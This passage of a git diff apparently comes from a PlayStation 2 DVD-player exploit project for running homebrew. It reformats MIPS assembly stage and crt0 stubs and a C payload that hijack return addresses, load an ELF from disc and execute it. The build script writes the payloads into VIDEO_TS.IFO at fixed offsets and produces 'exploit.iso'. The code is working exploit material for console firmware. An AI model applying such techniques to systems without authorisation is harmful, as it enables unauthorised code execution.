0x0057f1c iop_payload_address = 0xa00fd000 @@ -11,54 +11,59 @@ iop_payload_address = 0xa00fd000 .global _start _start: - move $fp, $sp # We need to reset $fp as it gets trashed by memcpy + move $fp, $sp # We need to reset $fp as it gets trashed by memcpy - la $v1, 0x27bdffc8 # addiu $sp, $sp, -0x38 + la $v1, 0x27bdffc8 # addiu $sp, $sp, -0x38 check_110: - #la $v0, READ_SECTORS_110 - #lw $t0, 0($v0) - #beq $t0, $v1, read_iop_payload + #la $v0, READ_SECTORS_110 + #lw $t0, 0($v0) + #beq $t0, $v1, read_iop_payload check_210: - la $v0, READ_SECTORS_210 - lw $t0, 0($v0) - beq $t0, $v1, read_iop_payload + la $v0, READ_SECTORS_210 + lw $t0, 0($v0) + beq $t0, $v1, read_iop_payload check_212: - la $v0, READ_SECTORS_212 + la $v0, READ_SECTORS_212 read_iop_payload: - la $a0, (IOP_PAYLOAD_SIZE / 0x800) + 1 # count - la $a1, 0x700000 / 0x800 # sector - la $a2, iop_payload_address # destination - jal $v0 - - #jal flushIcache - #jal flushDcache - - #jal ENTRY - la $v0, ENTRY - jalr $v0 - - la $v1, 0x27bdffc8 # addiu $sp, $sp, -0x38 + la $a0, (IOP_PAYLOAD_SIZE / 0x800) + 1 # count + la $a1, 0x700000 / 0x800 # sector + la $a2, iop_payload_address # destination + jal $v0 -check_110_again: + # jal flushIcache + # jal flushDcache + + # jal ENTRY + la $v0, ENTRY + jalr $v0 + la $v1, 0x27bdffc8 # addiu $sp, $sp, -0x38 + +check_110_again: + # AKuHAK: + # la $v0, READ_SECTORS_110 + # lw $v0, 0($v0) + # la $a0, RETURN_ADDRESS_LOCATION_110 + # la $ra, ORIGINAL_RETURN_ADDRESS_110 + # beq $v0, $v1, return check_210_again: - la $v0, READ_SECTORS_210 - lw $v0, 0($v0) - la $a0, RETURN_ADDRESS_LOCATION_210 - la $ra, ORIGINAL_RETURN_ADDRESS_210 - beq $v0, $v1, return + la $v0, READ_SECTORS_210 + lw $v0, 0($v0) + la $a0, RETURN_ADDRESS_LOCATION_210 + la $ra, ORIGINAL_RETURN_ADDRESS_210 + beq $v0, $v1, return check_212_again: - la $a0, RETURN_ADDRESS_LOCATION_212 - la $ra, ORIGINAL_RETURN_ADDRESS_212 + la $a0, RETURN_ADDRESS_LOCATION_212 + la $ra, ORIGINAL_RETURN_ADDRESS_212 return: - # Return gracefully back to original return address - sw $ra, 0($a0) - la $v0, 0 - jr $ra + # Return gracefully back to original return address + sw $ra, 0($a0) + la $v0, 0 + jr $ra diff --git a/PAYLOADS/1.00-2.13/stage1_213.iop.S b/PAYLOADS/1.00-2.13/stage1_213.iop.S index 5619259..81f82e5 100644 --- a/PAYLOADS/1.00-2.13/stage1_213.iop.S +++ b/PAYLOADS/1.00-2.13/stage1_213.iop.S @@ -3,7 +3,7 @@ flushIcache = 0x00002f40 flushDcache = 0x0003044 -#flushDcacheWrapper = 0x0057f1c +# flushDcacheWrapper = 0x0057f1c iop_payload_address = 0xa00fd000 @@ -11,28 +11,28 @@ iop_payload_address = 0xa00fd000 .global _start _start: - move $fp, $sp # We need to reset $fp as it gets trashed by memcpy + move $fp, $sp # We need to reset $fp as it gets trashed by memcpy - la $v0, READ_SECTORS_213 + la $v0, READ_SECTORS_213 read_iop_payload: - la $a0, (IOP_PAYLOAD_SIZE / 0x800) + 1 # count - la $a1, 0x700000 / 0x800 # sector - la $a2, iop_payload_address # destination - jal $v0 - - #jal flushIcache - #jal flushDcache - - #jal ENTRY - la $v0, ENTRY - jalr $v0 - - la $a0, RETURN_ADDRESS_LOCATION_213 - la $ra, ORIGINAL_RETURN_ADDRESS_213 + la $a0, (IOP_PAYLOAD_SIZE / 0x800) + 1 # count + la $a1, 0x700000 / 0x800 # sector + la $a2, iop_payload_address # destination + jal $v0 + + # jal flushIcache + # jal flushDcache + + # jal ENTRY + la $v0, ENTRY + jalr $v0 + + la $a0, RETURN_ADDRESS_LOCATION_213 + la $ra, ORIGINAL_RETURN_ADDRESS_213 return: - # Return gracefully back to original return address - sw $ra, 0($a0) - la $v0, 0 - jr $ra + # Return gracefully back to original return address + sw $ra, 0($a0) + la $v0, 0 + jr $ra diff --git a/PAYLOADS/1.00-2.13/syscalls.ee.S b/PAYLOADS/1.00-2.13/syscalls.ee.S index 6dedaec..1ec1bff 100644 --- a/PAYLOADS/1.00-2.13/syscalls.ee.S +++ b/PAYLOADS/1.00-2.13/syscalls.ee.S @@ -4,6 +4,7 @@ # as GCC adds move $v1, $v0 directly after jr $ra, effectively trashing $v0. # I don't know why this happens, but I do know enough about GCC that this # approach will most probably be easier. But feel free to try fixing it. +# TODO: fill an issue to the ps2dev team .global GetThreadId GetThreadId: @@ -43,14 +44,14 @@ SifSetReg: .global SifGetReg SifGetReg: - la $v1, 0x7a - syscall 0x7a - jr $ra + la $v1, 0x7a + syscall 0x7a + jr $ra .global ExecPS2 ExecPS2: - la $v1, 0x07 - syscall 0x07 # BTW why do we put the number here also? + la $v1, 0x07 + syscall 0x07 # BTW why do we put the number here also? # Not a syscall, but it might as well be. diff --git a/Filesystems/2.10-2.13/BOOT.ELF b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/BOOT.ELF similarity index 100% rename from Filesystems/2.10-2.13/BOOT.ELF rename to PAYLOADS/1.00-2.13/udf/VIDEO_TS/BOOT.ELF diff --git a/Filesystems/2.10-2.13/VIDEO_TS/VIDEO_TS.IFO b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VIDEO_TS.BUP similarity index 100% rename from Filesystems/2.10-2.13/VIDEO_TS/VIDEO_TS.IFO rename to PAYLOADS/1.00-2.13/udf/VIDEO_TS/VIDEO_TS.BUP diff --git a/PAYLOADS/3.03-3.11/crt0_3.10.elf b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VIDEO_TS.IFO similarity index 62% rename from PAYLOADS/3.03-3.11/crt0_3.10.elf rename to PAYLOADS/1.00-2.13/udf/VIDEO_TS/VIDEO_TS.IFO index 526b7b3..3722fa8 100644 Binary files a/PAYLOADS/3.03-3.11/crt0_3.10.elf and b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VIDEO_TS.IFO differ diff --git a/Filesystems/2.10-2.13/VIDEO_TS/VTS_01_0.IFO b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_0.BUP similarity index 100% rename from Filesystems/2.10-2.13/VIDEO_TS/VTS_01_0.IFO rename to PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_0.BUP diff --git a/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VTS_01_0.IFO b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_0.IFO similarity index 83% rename from Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VTS_01_0.IFO rename to PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_0.IFO index 0b6bed8..8d78ffe 100644 Binary files a/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VTS_01_0.IFO and b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_0.IFO differ diff --git a/PREBUILT ISOs/Some 2.10 models and all 2.12.iso b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_1.VOB similarity index 72% rename from PREBUILT ISOs/Some 2.10 models and all 2.12.iso rename to PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_1.VOB index a3e0371..5bb4f1b 100644 Binary files a/PREBUILT ISOs/Some 2.10 models and all 2.12.iso and b/PAYLOADS/1.00-2.13/udf/VIDEO_TS/VTS_01_1.VOB differ diff --git a/PAYLOADS/3.03-3.11/build.sh b/PAYLOADS/3.03-3.11/build.sh old mode 100644 new mode 100755 index d6afdad..6828fcd --- a/PAYLOADS/3.03-3.11/build.sh +++ b/PAYLOADS/3.03-3.11/build.sh @@ -1,50 +1,72 @@ -echo "Building payload" +#!/bin/sh +# TODO: replace ee-gcc with EE_CC ?= ee-gcc +# TODO: move flags into oneline: EE_CFLAGS = -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 +echo "Building payload" ee-gcc -Ttext=0x01FFF800 payload.c -o payload.elf -nostartfiles -nostdlib -ffreestanding -Os -Wl,-z,max-page-size=0x1 # 2048 ee-objcopy -O binary payload.elf payload.bin -Wl,-z,max-page-size=0x1 +PAYLOAD_SIZE=$(stat -c '%s' payload.bin) +dd if=payload.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x3000)) count=$PAYLOAD_SIZE conv=notrunc -ENTRY=`ee-objdump -t payload.elf | grep " _start"` -echo $ENTRY - -# Doesn't seem to work on MinGW toolchain, so set manually if you're using that: -#ENTRY=0x`grep -o "^\S*" <<< $ENTRY` -ENTRY=0x01fff99c +ENTRY=$(ee-objdump -t payload.elf | grep " _start") +echo "$ENTRY" +ENTRY=$(echo 0x"$ENTRY" | awk '{print $1}') echo $ENTRY +# ENTRY=0x'grep -o "^\S*" <<< $ENTRY' +# Doesn't seem to work on MinGW toolchain, so set manually if you're using that: +# ENTRY=0x01fff99c +# echo $ENTRY echo "Building crt0 (3.03)" ee-gcc -Ttext=0x015FFF34 -DENTRY=$ENTRY -DGETBUFFERINTERNAL=0x262360 crt0.S -o crt0_3.03.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 ee-objcopy -O binary crt0_3.03.elf crt0_3.03.bin -Wl,-z,max-page-size=0x1 +CRT0_303_SIZE=$(stat -c '%s' crt0_3.03.bin) +dd if=crt0_3.03.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x0e8c)) count=$CRT0_303_SIZE conv=notrunc echo "Building crt0 (3.04M)" ee-gcc -Ttext=0x01800180 -DENTRY=$ENTRY -DGETBUFFERINTERNAL=0x261548 crt0.S -o crt0_3.04M.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 ee-objcopy -O binary crt0_3.04M.elf crt0_3.04M.bin -Wl,-z,max-page-size=0x1 +CRT0_304M_SIZE=$(stat -c '%s' crt0_3.04M.bin) +dd if=crt0_3.04M.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x2d00)) count=$CRT0_304M_SIZE conv=notrunc echo "Building jump for 3.04J" -ee-gcc -Ttext=0x012811E4 -DJUMP=0x01281340 jump.S -o jump.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 -ee-objcopy -O binary jump.elf jump.bin -Wl,-z,max-page-size=0x1 +ee-gcc -Ttext=0x012811E4 -DJUMP=0x01281340 jump.S -o jump_3.04J.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 +ee-objcopy -O binary jump_3.04J.elf jump_3.04J.bin -Wl,-z,max-page-size=0x1 +JUMP_304J_SIZE=$(stat -c '%s' jump_3.04J.bin) +dd if=jump_3.04J.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x2724)) count=$JUMP_304J_SIZE conv=notrunc echo "Building crt0 (3.04J)" ee-gcc -Ttext=0x01281340 -DENTRY=$ENTRY -DGETBUFFERINTERNAL=0x261560 crt0.S -o crt0_3.04J.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 ee-objcopy -O binary crt0_3.04J.elf crt0_3.04J.bin -Wl,-z,max-page-size=0x1 +CRT0_304J_SIZE=$(stat -c '%s' crt0_3.04J.bin) +dd if=crt0_3.04J.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x2880)) count=$CRT0_304J_SIZE conv=notrunc echo "Building crt0 (3.10)" ee-gcc -Ttext=0x01500014 -DENTRY=$ENTRY -DGETBUFFERINTERNAL=0x2986a0 crt0.S -o crt0_3.10.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 ee-objcopy -O binary crt0_3.10.elf crt0_3.10.bin -Wl,-z,max-page-size=0x1 +CRT0_310_SIZE=$(stat -c '%s' crt0_3.10.bin) +dd if=crt0_3.10.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x2bb4)) count=$CRT0_310_SIZE conv=notrunc echo "Building crt0 (3.11)" ee-gcc -Ttext=0x01500014 -DENTRY=$ENTRY -DGETBUFFERINTERNAL=0x2952f0 crt0.S -o crt0_3.11.elf -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 ee-objcopy -O binary crt0_3.11.elf crt0_3.11.bin -Wl,-z,max-page-size=0x1 +CRT0_311_SIZE=$(stat -c '%s' crt0_3.11.bin) +dd if=crt0_3.11.bin of=udf/VIDEO_TS/VIDEO_TS.IFO bs=1 seek=$((0x2954)) count=$CRT0_311_SIZE conv=notrunc + +echo "CREATE UDF ISO" +genisoimage -udf -o exploit.iso udf/ echo "Done." -echo "For the All Slims image:" -echo "Insert crt0_3.03.bin into VIDEO_TS.IFO at offset 0x0e8c" -echo "Insert jump.bin into VIDEO_TS.IFO at offset 0x2724" +echo "For the Dragon image:" +echo "Insert crt0_3.03.bin into VIDEO_TS.IFO at offset 0x0e8c" +echo "Insert jump_3.04J.bin into VIDEO_TS.IFO at offset 0x2724" echo "Insert crt0_3.04J.bin into VIDEO_TS.IFO at offset 0x2880" -echo "Insert crt0_3.10.bin into VIDEO_TS.IFO at offset 0x2bb4" -echo "Insert crt0_3.11.bin into VIDEO_TS.IFO at offset 0x2954" -echo "Insert payload.bin into VIDEO_TS.IFO at offset 0x3000" - -echo "For 3.04M only image:" -echo "Insert fullpayload.bin at 0x2d00, and payload.bin at 0x3000" +echo "Insert crt0_3.11.bin into VIDEO_TS.IFO at offset 0x2954" +echo "Insert crt0_3.10.bin into VIDEO_TS.IFO at offset 0x2bb4" +echo "Insert crt0_3.04M.bin into VIDEO_TS.IFO at offset 0x2d00" +echo "Insert payload.bin into VIDEO_TS.IFO at offset 0x3000" +# generate 1 image for all 3.03+, 3.04M is the same in that terms +# echo "For 3.04M only image:" +# echo "Insert crt0_3.04M.bin at 0x2d00, and payload.bin at 0x3000" diff --git a/PAYLOADS/3.03-3.11/crt0.S b/PAYLOADS/3.03-3.11/crt0.S index 437e6cf..bd9e5f8 100644 --- a/PAYLOADS/3.03-3.11/crt0.S +++ b/PAYLOADS/3.03-3.11/crt0.S @@ -7,35 +7,35 @@ .global _start _start: - la $a0, load - la $a1, 0 - la $a2, 0 - la $a3, 0 + la $a0, load + la $a1, 0 + la $a2, 0 + la $a3, 0 .global ExecPS2 ExecPS2: - la $v1, 7 - syscall 7 # ExecPS2 + la $v1, 7 + syscall 7 # ExecPS2 load: - la $a0, 0 - la $a1, 0 # 0 = VIDEO_TS.IFO, 1 = VTS_01_0.IFO - la $a2, 0x3000 / 0x800 # lba offset in file - la $a3, payload # Destination - la $t0, 0x800 / 0x800 # Count - la $v0, getBufferInternal - jalr $v0 - la $t1, 0 + la $a0, 0 + la $a1, 0 # 0 = VIDEO_TS.IFO, 1 = VTS_01_0.IFO + la $a2, 0x3000 / 0x800 # lba offset in file + la $a3, payload # Destination + la $t0, 0x800 / 0x800 # Count + la $v0, getBufferInternal + jalr $v0 + la $t1, 0 boot: - la $v1, 0x64; la $a0, 0; syscall 0x64 # FlushCache data writeback - la $v1, 0x64; la $a0, 2; syscall 0x64 # FlushCache instruction invalidate + la $v1, 0x64; la $a0, 0; syscall 0x64 # FlushCache data writeback + la $v1, 0x64; la $a0, 2; syscall 0x64 # FlushCache instruction invalidate - # Point stack to end of scratchpad RAM - #la $sp, 0x70004000 - lui $sp, 0x7000 + # Point stack to end of scratchpad RAM + # la $sp, 0x70004000 + lui $sp, 0x7000 - # Execute from relocated place - la $v0, ENTRY - j $v0 - ori $sp, 0x4000 + # Execute from relocated place + la $v0, ENTRY + j $v0 + ori $sp, 0x4000 diff --git a/PAYLOADS/3.03-3.11/crt0_3.03.bin b/PAYLOADS/3.03-3.11/crt0_3.03.bin deleted file mode 100644 index b597d33..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.03.bin and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.03.elf b/PAYLOADS/3.03-3.11/crt0_3.03.elf deleted file mode 100644 index 6747ad1..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.03.elf and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.04J.bin b/PAYLOADS/3.03-3.11/crt0_3.04J.bin deleted file mode 100644 index 56c2d04..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.04J.bin and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.04J.elf b/PAYLOADS/3.03-3.11/crt0_3.04J.elf deleted file mode 100644 index 0f58533..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.04J.elf and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.04M.bin b/PAYLOADS/3.03-3.11/crt0_3.04M.bin deleted file mode 100644 index 5475657..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.04M.bin and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.04M.elf b/PAYLOADS/3.03-3.11/crt0_3.04M.elf deleted file mode 100644 index 0ae906f..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.04M.elf and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.10.bin b/PAYLOADS/3.03-3.11/crt0_3.10.bin deleted file mode 100644 index 070b4a0..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.10.bin and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.11.bin b/PAYLOADS/3.03-3.11/crt0_3.11.bin deleted file mode 100644 index 9d0f5a2..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.11.bin and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/crt0_3.11.elf b/PAYLOADS/3.03-3.11/crt0_3.11.elf deleted file mode 100644 index 4c0ddec..0000000 Binary files a/PAYLOADS/3.03-3.11/crt0_3.11.elf and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/jump.S b/PAYLOADS/3.03-3.11/jump.S index ee22303..6474c49 100644 --- a/PAYLOADS/3.03-3.11/jump.S +++ b/PAYLOADS/3.03-3.11/jump.S @@ -4,5 +4,5 @@ .global _start _start: - j JUMP - nop + j JUMP + nop diff --git a/PAYLOADS/3.03-3.11/jump.bin b/PAYLOADS/3.03-3.11/jump.bin deleted file mode 100644 index e6861a6..0000000 Binary files a/PAYLOADS/3.03-3.11/jump.bin and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/jump.elf b/PAYLOADS/3.03-3.11/jump.elf deleted file mode 100644 index ccdf4b4..0000000 Binary files a/PAYLOADS/3.03-3.11/jump.elf and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/payload.bin b/PAYLOADS/3.03-3.11/payload.bin deleted file mode 100644 index 484402c..0000000 Binary files a/PAYLOADS/3.03-3.11/payload.bin and /dev/null differ diff --git a/PAYLOADS/3.03-3.11/payload.c b/PAYLOADS/3.03-3.11/payload.c index 54bab92..e85e9c7 100644 --- a/PAYLOADS/3.03-3.11/payload.c +++ b/PAYLOADS/3.03-3.11/payload.c @@ -2,7 +2,7 @@ // Pick one #define LOAD_FROM_VTS_02_0_IFO -//#define LOAD_FROM_SECTOR_RELATIVE_TO_VIDEO_TS_IFO (151 - 138 - 7) +// #define LOAD_FROM_SECTOR_RELATIVE_TO_VIDEO_TS_IFO (151 - 138 - 7) #define min(a, b) (((a) < (b)) ? (a) : (b)) @@ -22,181 +22,193 @@ typedef unsigned char u8; typedef unsigned short u16; typedef unsigned int u32; -typedef struct { - u8 ident[16]; - u16 type; - u16 machine; - u32 version; - u32 entry; - u32 phoff; - u32 shoff; - u32 flags; - u16 ehsize; - u16 phentsize; - u16 phnum; - u16 shentsize; - u16 shnum; - u16 shstrndx; +typedef struct +{ + u8 ident[16]; + u16 type; + u16 machine; + u32 version; + u32 entry; + u32 phoff; + u32 shoff; + u32 flags; + u16 ehsize; + u16 phentsize; + u16 phnum; + u16 shentsize; + u16 shnum; + u16 shstrndx; } elf_header_t; -typedef struct { - u32 type; - u32 offset; - void *vaddr; - u32 paddr; - u32 filesz; - u32 memsz; - u32 flags; - u32 align; +typedef struct +{ + u32 type; + u32 offset; + void *vaddr; + u32 paddr; + u32 filesz; + u32 memsz; + u32 flags; + u32 align; } elf_pheader_t; -__attribute__((noreturn)) void ExecPS2(void *entry, void *gp, int argc, char **argv) { - asm volatile("la $v1, 7; syscall 7"); - //__builtin_unreachable(); +__attribute__((noreturn)) void ExecPS2(void *entry, void *gp, int argc, char **argv) +{ + asm volatile("la $v1, 7; syscall 7"); + //__builtin_unreachable(); + // TODO: warning: `noreturn' function does return } -static void *memcpy_(void *dest, void *src, size_t n) { - int i; - for(i = 0; i < n; i++) ((unsigned char *)dest)[i] = ((unsigned char *)src)[i]; - return dest; +static void *memcpy_(void *dest, void *src, size_t n) +{ + int i; + for (i = 0; i < n; i++) + ((unsigned char *)dest)[i] = ((unsigned char *)src)[i]; + return dest; } // Todo: maybe cache last sector to save 1 or 2 reads -static void *memset(void *dest, int c, size_t n) { - int i; - for(i = 0; i < n; i++) ((unsigned char *)dest)[i] = c; - return dest; +static void *memset(void *dest, int c, size_t n) +{ + int i; + for (i = 0; i < n; i++) + ((unsigned char *)dest)[i] = c; + return dest; } -static void readData(void *dest, unsigned int offset, size_t n) { - unsigned char buffer[0x800]; - - unsigned int copied = 0; - #define remaining (n - copied) - - if(offset % 0x800) { - getBufferInternal("", 1, offset / 0x800, buffer, 1, 0); - memcpy_(dest, buffer + offset % 0x800, min(0x800 - (offset % 0x800), n)); - copied += min(0x800 - (offset % 0x800), n); - } - - if(remaining >= 0x800) { - getBufferInternal("", 1, (offset + copied) / 0x800, dest + copied, remaining / 0x800, 0); - copied += (remaining / 0x800) * 0x800; - } - - if(remaining > 0) { - getBufferInternal("", 1, (offset + copied) / 0x800, buffer, 1, 0); - memcpy_(dest + copied, buffer, remaining); - } +static void readData(void *dest, unsigned int offset, size_t n) +{ + unsigned char buffer[0x800]; + + unsigned int copied = 0; +#define remaining (n - copied) + + if (offset % 0x800) { + getBufferInternal("", 1, offset / 0x800, buffer, 1, 0); + memcpy_(dest, buffer + offset % 0x800, min(0x800 - (offset % 0x800), n)); + copied += min(0x800 - (offset % 0x800), n); + } + + if (remaining >= 0x800) { + getBufferInternal("", 1, (offset + copied) / 0x800, dest + copied, remaining / 0x800, 0); + copied += (remaining / 0x800) * 0x800; + } + + if (remaining > 0) { + getBufferInternal("", 1, (offset + copied) / 0x800, buffer, 1, 0); + memcpy_(dest + copied, buffer, remaining); + } } -__attribute__((noreturn)) void _start(void) { - int i; - - // Identify version based on jump target location - if((*(void **)0x928D24) == (void *)0x15ea540) { - // 3.03 - pointToIFO = (void *)0x2432c8; - getDiscData = (void *)0x243438; - - getBufferInternal = (void *)0x262360; - - SifIopReset = (void *)0x291fb8; - SifIopSync = (void *)0x292138; - SifInitRpc = (void *)0x2082a0; - SifExitRpc = (void *)0x208440; - } - else if((*(void **)0x6D9C3C) == (void *)0x126b7e0) { - // 3.04J - pointToIFO = (void *)0x23dfe0; - getDiscData = (void *)0x23e150; - - getBufferInternal = (void *)0x261560; - - SifIopReset = (void *)0x84fe0; - SifIopSync = (void *)0x85110; - SifInitRpc = (void *)0x84180; - SifExitRpc = (void *)0x84310; - } - else if((*(void **)0x95CF40) == (void *)0x1800180) { - // 3.04M - pointToIFO = (void *)0x23dfc8; - getDiscData = (void *)0x23e138; - - getBufferInternal = (void *)0x261548; - - SifIopReset = (void *)0x291358; - SifIopSync = (void *)0x2914d8; - SifInitRpc = (void *)0x208260; - SifExitRpc = (void *)0x208400; - } - else if((*(void **)0x5f1f38) == (void *)0x1500014) { - // 3.10 - pointToIFO = (void *)0x25c880; - getDiscData = (void *)0x25c9f0; - - getBufferInternal = (void *)0x002986a0; - - SifIopReset = (void *)0x84fe0; - SifIopSync = (void *)0x85110; - SifInitRpc = (void *)0x84180; - SifExitRpc = (void *)0x84310; - } - else if((*(void **)0x3EA438) == (void *)0x1500014) { - // 3.11 - pointToIFO = (void *)0x258a28; - getDiscData = (void *) 0x258b98; - - getBufferInternal = (void *)0x2952f0; - - SifIopReset = (void *)0x20e7d8; - SifIopSync = (void *)0x20e958; - SifInitRpc = (void *)0x208d80; - SifExitRpc = (void *)0x208f20; - } - - #ifdef LOAD_FROM_VTS_02_0_IFO - // point to VTS_02_0.IFO - pointToIFO(2, 0, 0); - - // Force a read from VTS_02_0.IFO - char head[64]; - getDiscData(64, &head); - - #define RELATIVE_SECTOR 0 - #else - #define RELATIVE_SECTOR LOAD_FROM_SECTOR_RELATIVE_TO_VIDEO_TS_IFO - #endif - - // Based on https://github.com/AKuHAK/uLaunchELF/blob/master/loader/loader.c - elf_header_t eh; - readData(&eh, RELATIVE_SECTOR * 0x800, sizeof(elf_header_t)); - - elf_pheader_t eph[eh.phnum]; - readData(&eph, RELATIVE_SECTOR * 0x800 + eh.phoff, sizeof(elf_pheader_t) * eh.phnum); - - for (i = 0; i < eh.phnum; i++) { - if (eph[i].type != ELF_PT_LOAD) - continue; - - readData(eph[i].vaddr, RELATIVE_SECTOR * 0x800 + eph[i].offset, eph[i].filesz); - if(eph[i].memsz > eph[i].filesz) memset(eph[i].vaddr + eph[i].filesz, 0, eph[i].memsz - eph[i].filesz); - } - - asm volatile("la $v1, 0x64; la $a0, 0; syscall 0x64"); // FlushCache data writeback - asm volatile("la $v1, 0x64; la $a0, 2; syscall 0x64"); // FlushCache instruction invalidate - - //while(!SifIopReset("", 0)); - //while(!SifIopSync()); - - //while(!SifIopReset("rom0:UDNL rom0:EELOADCNF", 0)); - SifIopReset("rom0:UDNL rom0:EELOADCNF", 0); - while(!SifIopSync()); - - SifInitRpc(0); - SifExitRpc(); - - char *argv[] = { "cdrom0:\\VIDEO_TS\\VTS_02_0.IFO" }; - ExecPS2((void *)eh.entry, 0, 1, &argv); +__attribute__((noreturn)) void _start(void) +{ + int i; + + // Identify version based on jump target location + if ((*(void **)0x928D24) == (void *)0x15ea540) { + // 3.03 + pointToIFO = (void *)0x2432c8; + getDiscData = (void *)0x243438; + + getBufferInternal = (void *)0x262360; + + SifIopReset = (void *)0x291fb8; + SifIopSync = (void *)0x292138; + SifInitRpc = (void *)0x2082a0; + SifExitRpc = (void *)0x208440; + } else if ((*(void **)0x6D9C3C) == (void *)0x126b7e0) { + // 3.04J + pointToIFO = (void *)0x23dfe0; + getDiscData = (void *)0x23e150; + + getBufferInternal = (void *)0x261560; + + SifIopReset = (void *)0x84fe0; + SifIopSync = (void *)0x85110; + SifInitRpc = (void *)0x84180; + SifExitRpc = (void *)0x84310; + } else if ((*(void **)0x95CF40) == (void *)0x1800180) { + // 3.04M + pointToIFO = (void *)0x23dfc8; + getDiscData = (void *)0x23e138; + + getBufferInternal = (void *)0x261548; + + SifIopReset = (void *)0x291358; + SifIopSync = (void *)0x2914d8; + SifInitRpc = (void *)0x208260; + SifExitRpc = (void *)0x208400; + } else if ((*(void **)0x5f1f38) == (void *)0x1500014) { + // 3.10 + pointToIFO = (void *)0x25c880; + getDiscData = (void *)0x25c9f0; + + getBufferInternal = (void *)0x002986a0; + + SifIopReset = (void *)0x84fe0; + SifIopSync = (void *)0x85110; + SifInitRpc = (void *)0x84180; + SifExitRpc = (void *)0x84310; + } else if ((*(void **)0x3EA438) == (void *)0x1500014) { + // 3.11 + pointToIFO = (void *)0x258a28; + getDiscData = (void *)0x258b98; + + getBufferInternal = (void *)0x2952f0; + + SifIopReset = (void *)0x20e7d8; + SifIopSync = (void *)0x20e958; + SifInitRpc = (void *)0x208d80; + SifExitRpc = (void *)0x208f20; + } + +#ifdef LOAD_FROM_VTS_02_0_IFO + // point to VTS_02_0.IFO + pointToIFO(2, 0, 0); + + // Force a read from VTS_02_0.IFO + char head[64]; + getDiscData(64, &head); + +#define RELATIVE_SECTOR 0 +#else +#define RELATIVE_SECTOR LOAD_FROM_SECTOR_RELATIVE_TO_VIDEO_TS_IFO +#endif + + // Based on https://github.com/ps2homebrew/uLaunchELF/blob/master/loader/loader.c + elf_header_t eh; + readData(&eh, RELATIVE_SECTOR * 0x800, sizeof(elf_header_t)); + + elf_pheader_t eph[eh.phnum]; + readData(&eph, RELATIVE_SECTOR * 0x800 + eh.phoff, sizeof(elf_pheader_t) * eh.phnum); + + for (i = 0; i < eh.phnum; i++) { + if (eph[i].type != ELF_PT_LOAD) + continue; + + readData(eph[i].vaddr, RELATIVE_SECTOR * 0x800 + eph[i].offset, eph[i].filesz); + if (eph[i].memsz > eph[i].filesz) + memset(eph[i].vaddr + eph[i].filesz, 0, eph[i].memsz - eph[i].filesz); + } + + asm volatile("la $v1, 0x64; la $a0, 0; syscall 0x64"); // FlushCache data writeback + asm volatile("la $v1, 0x64; la $a0, 2; syscall 0x64"); // FlushCache instruction invalidate + + // while (!SifIopReset("", 0)) + // ; + // while (!SifIopSync()) + // ; + + // while (!SifIopReset("rom0:UDNL rom0:EELOADCNF", 0)) + // ; + SifIopReset("rom0:UDNL rom0:EELOADCNF", 0); + while (!SifIopSync()) + ; + + SifInitRpc(0); + SifExitRpc(); + + char *argv[] = {"cdrom0:\\VIDEO_TS\\VTS_02_0.IFO"}; + ExecPS2((void *)eh.entry, 0, 1, &argv); + // TODO: warning: passing arg 4 of `ExecPS2' from incompatible pointer type } diff --git a/PAYLOADS/3.03-3.11/payload.elf b/PAYLOADS/3.03-3.11/payload.elf deleted file mode 100644 index adedd9e..0000000 Binary files a/PAYLOADS/3.03-3.11/payload.elf and /dev/null differ diff --git a/Filesystems/All PS2 slims (3.10 + 3.11) - English 